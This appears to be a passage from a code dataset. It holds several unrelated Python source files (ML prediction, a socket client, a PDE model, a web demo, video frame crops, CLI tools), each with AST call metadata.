((168, 22, 168, 44), 'info.models.User.last_login.desc', 'User.last_login.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((211, 22, 211, 45), 'info.models.News.create_time.desc', 'News.create_time.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((334, 22, 334, 45), 'info.models.News.create_time.desc', 'News.create_time.desc', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((167, 19, 167, 60), 'info.models.User.query.filter', 'User.query.filter', ({(167, 37, 167, 59): 'User.is_admin == False'}, {}), '(User.is_admin == False)', False, 'from info.models import User, Category, News\n'), ((210, 19, 210, 46), 'info.models.News.query.filter', 'News.query.filter', ({(210, 37, 210, 45): '*filters'}, {}), '(*filters)', False, 'from info.models import User, Category, News\n'), ((333, 19, 333, 46), 'info.models.News.query.filter', 'News.query.filter', ({(333, 37, 333, 45): '*filters'}, {}), '(*filters)', False, 'from info.models import User, Category, News\n')] |
Swati17293/outlet-prediction | src/predict_model.py | 3c1f41b88d71b5247763bacc9dbc1abf5d0619a2 | #Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
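# Collect the answer column (source_uri) from the training CSV; used to fit the tokenizer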
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
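# Decode each prediction: take the argmax at every position, map indices back to words, and drop padding (index 0) and consecutive duplicate words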
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | [((50, 25, 50, 66), 'numpy.load', 'np.load', ({(50, 33, 50, 65): '"""data/vectorized/Test_title.npy"""'}, {}), "('data/vectorized/Test_title.npy')", True, 'import numpy as np\n'), ((51, 27, 51, 70), 'numpy.load', 'np.load', ({(51, 35, 51, 69): '"""data/vectorized/Test_summary.npy"""'}, {}), "('data/vectorized/Test_summary.npy')", True, 'import numpy as np\n'), ((53, 18, 53, 49), 'keras.preprocessing.text.Tokenizer', 'text.Tokenizer', (), '', False, 'from keras.preprocessing import text\n'), ((32, 16, 32, 29), 'csv.reader', 'csv.reader', ({(32, 27, 32, 28): 'f'}, {}), '(f)', False, 'import csv\n'), ((96, 7, 96, 32), 'os.path.exists', 'os.path.exists', ({(96, 22, 96, 31): '"""reports"""'}, {}), "('reports')", False, 'import os\n'), ((97, 8, 97, 27), 'os.mkdir', 'os.mkdir', ({(97, 17, 97, 26): '"""reports"""'}, {}), "('reports')", False, 'import os\n'), ((99, 7, 99, 41), 'os.path.isfile', 'os.path.isfile', ({(99, 22, 99, 40): '"""reports/Test.ans"""'}, {}), "('reports/Test.ans')", False, 'import os\n'), ((66, 11, 66, 38), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((70, 21, 70, 48), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((72, 28, 72, 57), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n')] |
Alisa1114/yolov4-pytorch-1 | tools/client.py | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | # -*- coding: UTF-8 -*-
from socket import *
def client():
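# Connect to the configured server, send the contents of tools/address.txt, and print the reply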
# Lab computer
# serverip='120.126.151.182'
# serverport=8887
# Test on the local machine
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "National Taipei University is No.1 in the world :)"
hassaniqbal209/data-assimilation | dapy/models/kuramoto_sivashinsky.py | ec52d655395dbed547edf4b4f3df29f017633f1b | """Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physics, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronautica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = ((ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²)) dt + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physics, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronautica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, Lloyd N.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, Steven M. and Matthews, Paul C.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
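# Fourier-space form of the non-linear advection term -X * dX/ds, computed via an inverse/forward FFT round trip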
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
| [((144, 26, 146, 9), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', ({(145, 12, 145, 56): 'state_noise_kernel + 1.0j * state_noise_kernel', (145, 58, 145, 63): 'False'}, {}), '(state_noise_kernel + 1.0j * state_noise_kernel, False)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((152, 28, 154, 9), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', ({(153, 12, 153, 60): 'initial_state_kernel + 1.0j * initial_state_kernel', (153, 62, 153, 67): 'False'}, {}), '(initial_state_kernel + 1.0j * initial_state_kernel,\n False)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((164, 26, 171, 9), 'dapy.integrators.etdrk4.FourierETDRK4Integrator', 'FourierETDRK4Integrator', (), '', False, 'from dapy.integrators.etdrk4 import FourierETDRK4Integrator\n'), ((141, 14, 141, 77), 'numpy.exp', 'np.exp', ({(141, 21, 141, 76): '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'}, {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)', True, 'import numpy as np\n'), ((149, 14, 149, 77), 'numpy.exp', 'np.exp', ({(149, 21, 149, 76): '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'}, {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)', True, 'import numpy as np\n'), ((182, 31, 182, 50), 'numpy.zeros', 'np.zeros', ({(182, 40, 182, 49): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n'), ((190, 33, 190, 65), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', ({(190, 58, 190, 64): 'states'}, {}), '(states)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((194, 38, 194, 70), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', ({(194, 63, 194, 69): 'states'}, {}), '(states)', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((135, 24, 135, 53), 'numpy.arange', 'np.arange', ({(135, 34, 135, 52): '(dim_state // 2 + 1)'}, {}), '(dim_state // 2 + 1)', True, 'import numpy as np\n'), ((161, 41, 161, 67), 'dapy.models.transforms.fft.irfft', 'fft.irfft', (), '', False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((173, 30, 173, 49), 'numpy.zeros', 'np.zeros', ({(173, 39, 173, 48): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n'), ((176, 16, 176, 35), 'numpy.zeros', 'np.zeros', ({(176, 25, 176, 34): 'dim_state'}, {}), '(dim_state)', True, 'import numpy as np\n')] |
Lif3line/myo-helper | setup.py | 7c71a3ee693661ddba0171545bf5798f46231b3c | """Utility functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| [((12, 15, 12, 30), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
karldoenitz/karlooper | demos/restful-users/index.py | 2e1df83ed1ec9b343cdd930162a4de7ecd149c04 | # -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| [((41, 18, 41, 61), 'karlooper.web.application.Application', 'Application', (), '', False, 'from karlooper.web.application import Application\n'), ((33, 16, 33, 27), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((34, 14, 34, 25), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n')] |
LijiangLong/3D-ResNets-PyTorch | temporal_transforms.py | 89d2cba0b52d55aaa834635a81c172bc38771cd3 | import random
import math
class LoopPadding(object):
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30
offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14
begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29)
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | [((102, 22, 102, 49), 'random.randint', 'random.randint', ({(102, 37, 102, 38): '0', (102, 40, 102, 48): 'rand_end'}, {}), '(0, rand_end)', False, 'import random\n')] |
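# Illustrative usage sketch for the transforms above (hypothetical input, not part of the
# original file): crop a 40-frame index list down to 16 frames.
frame_indices = list(range(1, 41))

center_crop = TemporalCenterCrop(16)   # 16 indices taken around the middle of the clip
random_crop = TemporalRandomCrop(16)   # 16 consecutive indices from a random start offset

print(center_crop(frame_indices))
print(random_crop(frame_indices))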
geofft/waiter | cli/waiter/subcommands/kill.py | 0e10cd497c2c679ea43231866d9f803c3fed5d77 | from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
| [((7, 4, 7, 30), 'waiter.util.guard_no_cluster', 'guard_no_cluster', ({(7, 21, 7, 29): 'clusters'}, {}), '(clusters)', False, 'from waiter.util import guard_no_cluster, check_positive\n'), ((12, 14, 12, 111), 'waiter.action.process_kill_request', 'process_kill_request', ({(12, 35, 12, 43): 'clusters', (12, 45, 12, 69): 'token_name_or_service_id', (12, 71, 12, 84): 'is_service_id', (12, 86, 12, 96): 'force_flag', (12, 98, 12, 110): 'timeout_secs'}, {}), '(clusters, token_name_or_service_id, is_service_id,\n force_flag, timeout_secs)', False, 'from waiter.action import process_kill_request\n')] |
syeda-khurrath/fabric8-analytics-common | a2t/src/a2t.py | 421f7e27869c5695ed73b51e6422e097aba00108 | """The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| [((39, 4, 39, 43), 'fastlog.log.info', 'log.info', ({(39, 13, 39, 42): '"""Checking: core API endpoint"""'}, {}), "('Checking: core API endpoint')", False, 'from fastlog import log\n'), ((50, 4, 50, 62), 'fastlog.log.info', 'log.info', ({(50, 13, 50, 61): '"""Checking: authorization token for the core API"""'}, {}), "('Checking: authorization token for the core API')", False, 'from fastlog import log\n'), ((62, 4, 62, 28), 'fastlog.log.info', 'log.info', ({(62, 13, 62, 27): '"""System check"""'}, {}), "('System check')", False, 'from fastlog import log\n'), ((75, 4, 75, 26), 'fastlog.log.setLevel', 'log.setLevel', ({(75, 17, 75, 25): 'log.INFO'}, {}), '(log.INFO)', False, 'from fastlog import log\n'), ((76, 20, 76, 43), 'cliargs.cli_parser.parse_args', 'cli_parser.parse_args', ({}, {}), '()', False, 'from cliargs import cli_parser\n'), ((40, 9, 40, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((51, 9, 51, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((63, 9, 63, 21), 'fastlog.log.indent', 'log.indent', ({}, {}), '()', False, 'from fastlog import log\n'), ((79, 8, 79, 19), 'sys.exit', 'sys.exit', ({(79, 17, 79, 18): '(0)'}, {}), '(0)', False, 'import sys\n'), ((81, 14, 81, 34), 'setup.setup', 'setup', ({(81, 20, 81, 33): 'cli_arguments'}, {}), '(cli_arguments)', False, 'from setup import setup\n'), ((83, 22, 83, 64), 'os.environ.get', 'os.environ.get', ({(83, 37, 83, 57): '"""F8A_SERVER_API_URL"""', (83, 59, 83, 63): 'None'}, {}), "('F8A_SERVER_API_URL', None)", False, 'import os\n'), ((84, 29, 85, 90), 'component_analysis.ComponentAnalysis', 'ComponentAnalysis', ({(84, 47, 84, 58): 'coreapi_url', (85, 47, 85, 66): "cfg['access_token']", (85, 68, 85, 83): "cfg['user_key']", (85, 85, 85, 89): 'True'}, {}), "(coreapi_url, cfg['access_token'], cfg['user_key'], True)", False, 'from component_analysis import ComponentAnalysis\n'), ((86, 25, 87, 82), 'stack_analysis.StackAnalysis', 'StackAnalysis', ({(86, 39, 86, 50): 'coreapi_url', (87, 39, 87, 58): "cfg['access_token']", (87, 60, 87, 75): "cfg['user_key']", (87, 77, 87, 81): 'True'}, {}), "(coreapi_url, cfg['access_token'], cfg['user_key'], True)", False, 'from stack_analysis import StackAnalysis\n'), ((98, 13, 98, 19), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((100, 8, 100, 73), 'test_runner.start_tests', 'start_tests', ({(100, 20, 100, 23): 'cfg', (100, 25, 100, 30): 'tests', (100, 32, 100, 36): 'tags', (100, 38, 100, 56): 'component_analysis', (100, 58, 100, 72): 'stack_analysis'}, {}), '(cfg, tests, tags, component_analysis, stack_analysis)', False, 'from test_runner import start_tests\n'), ((101, 13, 101, 19), 